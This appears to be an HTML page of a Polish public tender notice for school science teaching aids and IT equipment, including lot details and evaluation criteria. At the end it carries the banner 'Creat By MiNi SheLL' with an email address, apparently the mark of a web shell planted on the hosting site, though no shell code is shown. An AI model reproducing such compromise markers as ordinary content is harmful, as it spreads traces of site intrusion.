gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.Zgodnie z art. 8a. ust. 5 ustawy Pzp. zamawiający informuje o następujących ograniczeniach opisanych w przedmiotowej ustawie a wynikających z art. 8a ust. 2 i 4 oraz art. 97 ust. 1a ustawy Pzp.: Art. 8a ust. 2. W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu.Art. 8 a ust. 4 Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.Art. 97 ust. 1 a W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>,,Dostawa pomocy naukowych"</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>W zakres zamówienia wchodzi dostawa takich pomocy naukowych jak: Mikroskop z podłączeniem do komputera - szt. 2, Fartuchy laboratoryjne - szt. 60, Apteczka z wyposażeniem - szt. 2, Tacki, deski do krojenia - szt. 30, Mikroskopy optyczne (szkolne, stereoskopowe) - szt. 30, Mikroskopy terenowe - szt. 20, Waga laboratoryjna - szt. 2, Skalpele , nożyczki - 30 zestawów, Lornetki - 30 szt., lupy - 30 szt., Ciśnieniomierz - 2 szt, Czerpak do pobierania próbek wody - 30 szt, Termometry laboratoryjne - 30 szt., Pęsety - 30 szt., Zestaw preparatów mikroskopowych - bezkręgowce - 30 zestawów, Zestaw preparatów mikroskopowych - rośliny jadalne 30 zestawów, Zestaw preparatów mikroskopowych - tkanki ssaków 30 zestawów, Zestaw preparatów mikroskopowych - grzyby 30 zestawów, Zestaw preparatów mikroskopowych - tkanki człowieka zdrowe - 30 zestawów, Zestaw preparatów mikroskopowych - tkanki człowieka zmienione chorobowo - 30 zestawów, Zestaw preparatów mikroskopowych - preparaty zoologiczne - 30 zestawów, Model szkieletu człowieka - 2 szt. , Model serca - 20 szt. , Model skóry człowieka - 2 szt., Model budowy anatomicznej człowieka - 2 szt, Akwarium do hodowli roślin wodnych - 2 szt., Cyfrowe, mobilne laboratorium biologiczno-chemiczne - 4 szt., Dygestorium - 2 szt. , Tace laboratoryjne - 30 szt., Butelki do roztworów z doszlifowanym korkiem - 60 szt., Palniki gazowe - 30 szt. , Szczypce metalowe - 60 szt. , Waga laboratoryjna z dokładnością do 0,1g - 20 szt., Podnośniki - 20 szt., Zlewki różnej wielkości - 30 kpl., Bagietki - 60 szt., Termometry laboratoryjne - 30 szt., Rozdzielacze - 30 szt., Parownica porcelanowa - 30 szt., Tryskawki - 30 szt., Elektrody grafitowe - 30 szt., Łyżki laboratoryjne - 60 szt., Łyżki do spalań - 30 szt., Korki do probówek z otworem - 60 szt., Kolba okrągło denna - 30 szt., Kolba stożkowa - 30 szt., Cylinder miarowy plastikowy wysoki - 30 szt, moździerz porcelanowy z tłuczkiem 100mm - 30 szt., Bibuła laboratoryjna - 2 opakowania, Parafilm - 2 szt., Metale, niemetale, tlenki, wodorotlenki, kwasy, sole, alkohole, cukry - 2 zestawy, Białka, albumina - 2 szt., Szczotki laboratoryjne - 10 szt., Modele do budowania cząsteczek - 2 zestawy, Tabela rozpuszczalności - plansza - 2 szt, Pipety Pasteura - 2 zestawy, Probówki - 10 sztuk - 20 zestawów, Butelka z zakraplaczem - 30 szt., Szalki Petriego - 60 szt., Statyw - 10 szt., zestaw szkiełek nakrywkowych - 10 zestawów, suszarka na szkło laboratoryjne - 2 szt., okulary ochronne - 60 szt., Fartuch laboratoryjny - 60 szt., Szafa (metalowa z odciągiem) na odczynnik - 2 szt., Cyfrowe, mobilne laboratorium uniwersalne - 4 szt., wskaźnik laserowy - 2 szt., Suwmiarki - 10 szt., Palniki gazowe - 30 szt., Taśma miernicza - 4 szt, Pudelko z opiłkami ferromagnetycznymi - 4 szt., Zestaw magnesów 28 elementów - 2 zestawy, Zestaw soczewek - 2 zestawy, Lusterko wklęsło wypukłe - 4 szt. , pryzmat akrylowy lub szklany - 4 szt., Samochodzik -zabawka z napędem elektrycznym o zasilaniu bateryjnym - 2 szt., Zasilacz prądu stałego o możliwym poborze prądu 3A z zabezpieczeniem przeciw przeciążeniowym - 2 szt., Mierniki uniwersalne z osobnym gniazdem 10A wyposażone możliwość pomiaru temperatury - 4 szt., rurka do demonstracji zjawiska konwekcji - 2 szt., Generator van de Graaffa - 2 szt., Teleskop - 2 szt., Statyw Z wyposażeniem - 2 szt., Izolowane przewody (komplet 10 szt) - 4 kpl., Opornik (10 sztuk) - 2 kpl. , Żarówki miniaturowe 3,5 V - 20 szt., Oprawka do żarówek miniaturowych - 20 szt., Dioda LED - 20 szt., magnes neodymowy - 20 szt., Pojemnik próżniowy z pompką - 2 szt., Szkła optyczne (zestaw) - 2 zestawy, Sprężynka ,,slinky" - 2 szt., GPS - 2 szt., Kompas - 50 szt., nawigacja satelitarna - 2 szt., Atlasy - 50 szt. , Mapy ścienne świata - ogólno geograficzna - 2 szt., Mapy ścienne świata - klimatyczna - 2 szt., Mapa ścienna - Europa - 2 szt., Mapa ścienna - Ameryki - 2 szt., mapy ścienne Arktyki i Antarktyki - 2 szt., wspólna mapa dla wszystkich trzech elementów (tektoniki i płyt litosfery) 2 szt., Globus uczniowski - 50 szt., Globus w większej skali - 2 szt., Globus indukcyjny - 2 szt., Tellurium lub inny model przedstawiający wzajemne relacje Ziemi, Słońca i Księżyca 2 szt., Mapy topograficzne najbliższej okolicy - 30 szt., Plan miasta, w którym znajduje się szkoła lub innego najbliższego oraz plan Paryża, Londynu lub innej światowej metropolii - 30 szt., okazy skał i minerałów oraz przykłady skamieniałości - 2 szt., Tablica ,,Profile glebowe" - 2 szt., Mapy turystyczne różnych regionów Polski i Europy - 30 szt., Mapy samochodowe Polski, regionów Polski i Europy - 30 szt., dane statystyczne w formie publikacji (np. roczniki statystyczne) - 30 szt., Mapy ścienne Polski - podział administracyjny, ogólno geograficzna - 4 szt., Publikacje albumowe - 4 szt., Teleskop - 2 szt., Cyfrowe, mobilne laboratorium do fizyki - 4 szt., zestaw matematycznych gier dydaktycznych i logicznych - 4 zest., Bryły geometryczne - zestaw - 2 zestawy, siatki brył i figur geometrycznych - 2 zestawy, Pracownia mat. Bryły nieregularne - 2 zestawy, Pracownia mat. Zestawy tablicowe/plansze dydaktyczne - 2 zestawy, Zestaw miar - 2 zestawy, Lupa - 60 szt., Pudełko do obserwacji okazów (z 2 lupami) - 30 szt. , Lornetka - 30 szt., Mikroskop z podłączeniem do komputera - 10 szt., Zestaw preparatów do mikroskopowych - tkanki ssaków 2 zestawy, Zestaw preparatów do mikroskopowych - co żyje w kropli wody - 2 zestawy, Zestaw preparatów do mikroskopowych - tkanki człowieka - 2 zestawy, Zestaw preparatów do mikroskopowych - preparaty zoologiczne - 2 zestawy, Zestaw preparatów do mikroskopowych - przyroda - 2 zestawy, Zestaw preparatów do mikroskopowych biologicznych - 2 zestawy, Taśma miernicza - 2 szt., Stoper - 2 szt., Termometr zaokienny - 2 szt., Kompas - 10 szt., Deszczomierz - 2 szt., Barometr - 2 szt. , Wiatromierz - 2 szt., Zestaw siłomierzy - 2 zestawy, Zestaw pałeczek do elektryzowania - 4 zestawy, Przewodniki i izolatory - 10 szt., Izolowane przewody do 45 cm - 2 kpl., Baterie o różnej sile elektromotorycznej - 2 zestawy, zestaw magnesów -28 elementów - 2 zestawy, pudełko z opiłkami ferromagnetycznymi - 2 szt., Magnesy neodymowe - 10 szt., Igła magnetyczna - 2 szt., Zestaw soczewek - 2 zestawy, Zestaw optyczny - mieszanie barw - krążek Newtona - 2 szt., Zestaw kostek o różnych objętościach i równych masach - 2 zestawy, Piłeczki różnych rozmiarów i różnym stopniu sprężystości. - 2 zestawy, Latarka z żarówką o dużej mocy i laserem czerwonym - 10 szt., Zestaw skali minerałów - 2 zestawy, Ciśnieniomierz - 2 szt., Zlewki różnej wielkości - 2 kpl., Butelki z zakraplaczem - 4 szt., Statyw - 2 szt., Pęseta - 30 szt., Pudełko plastikowe na preparaty - 10 szt., Wskaźniki pH - 2 zestawy, Zestaw akwarystyczne - 2 zestawy, Przenośny zestaw do badania wody - 2 zestawy, Rękawiczki lateksowe - 2 opakowania, Czajnik elektryczny bezprzewodowy z regulacja temperatury - 2 szt., Listwa zasilająca - 2 szt., Globus indukcyjny - 2 szt., Globus fizyczny - 2 szt., Globus fizyczny duży - 2 szt., Globus konturowy - 2 szt., Globus konturowy podświetlany - 2 szt., Polska mapa ścienna, fizyczna. - 2 szt., Świat - mapa fizyczna - 2 szt., Europa - mapa fizyczna - 2 szt, Krajobraz świata - mapa - 2 szt., Krajobraz świata - mapa, Ochrona przyrody w Polsce-mapa - 2 szt., mapy topograficzne najbliższej okolice - 30 szt., obrotowa mapa nieba - 30 szt., Model szkieletu człowieka skala 1:1 - 2 szt., szkielet człowieka z ruchomymi elementami skala 1:2 - 2 szt., Modele ; szkielet ryby, płaza, gada, ptaka, ssaka - 2 zestawy, Fantom - dziecinny manekin ratowniczy - 2 szt., Plansza roślin trujących - 2 szt., Plansza grzyby trujące - 2 szt., Plansze obrazujące zmysły człowieka - 2 szt. , Plansza wskaźników biologicznych środowiska, skala porostowa - 2 szt. , Plansza budowa kwiatu, rodzaje kwiatostanów, rodzaje liści i korzeni - 2 szt., Plansze etapów rozwoju człowieka - 2 szt., Plansze rodzajów chmur - 2 szt., Plansze obiegu wody w przyrodzie - 2 szt. , Przewodnik do rozpoznawania drzew - 30 szt., Przewodnik do rozpoznawania zwierząt - 30 szt., Atlas pogoda i klimat - 30 szt., Atlas ptaków w Polsce - 10 szt., Atlas owadów - 10 szt. , Atlas grzybów - 10 szt., Atlas minerałów, kamieni szlachetnych i skał - 10 szt., Atlas zwierząt chronionych w Polsce - 4 szt., Atlas roślin chronionych w Polsce - 10 szt., Atlas geograficzny - 30 szt., Atlas przyrodniczy - 30 szt., Mały atlas anatomiczny - 30 szt., Przewodnik do rozpoznawania grzybów - 10 szt., Magnesy do tablicy - 4 opakowania, Strzykawki jednorazowe - 60 szt., MERGE CUBE SMART KOSTKA ZABAWA i NAUKA - iOS/Andro - nie gorszy niż/ lub równoważny - 2 szt., Układ okresowy - plansza - 2 szt., Mapa ścienna - Afryki - 2 szt., mapa ścienna ogólnogeograficzna Australii - 2 szt.Szczegółowy opis zamówienia znajduje się w załączniku nr 4 do SIWZ<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39162100-6, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 13<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin realizacji </td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Część 1 zamówienia: Termin realizacji: najkrótszy termin realizacji zamówienia - 5 dni roboczych od dnia podpisania umowy, natomiast najdłuższy termin - 13 dni roboczych od dnia podpisania umowy<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>,,Dostawa sprzętu IT"</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>W zakres zamówienia wchodzi dostawa:- Laptopy - 8 szt.- Monitor interaktywny dotykowy ze statywem - 2 szt.- Drukarka 3D - 1 szt- Aparat fotograficzny - 2 szt.- Odtwarzacz CD z głośnikami - 2 szt.- Monitor interaktywny dotykowy - 2 szt.Szczegółowy opis zamówienia znajduje się w załączniku nr 6 do SIWZ<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>30236000-2, 32420000-3, 30213100-6, 32322000-6<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 13<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin realizacji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Część 2 zamówienia: Termin realizacji: najkrótszy termin realizacji zamówienia - 5 dni roboczych od dnia podpisania umowy, natomiast najdłuższy termin - 13 dni roboczych od dnia podpisania umowy<br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com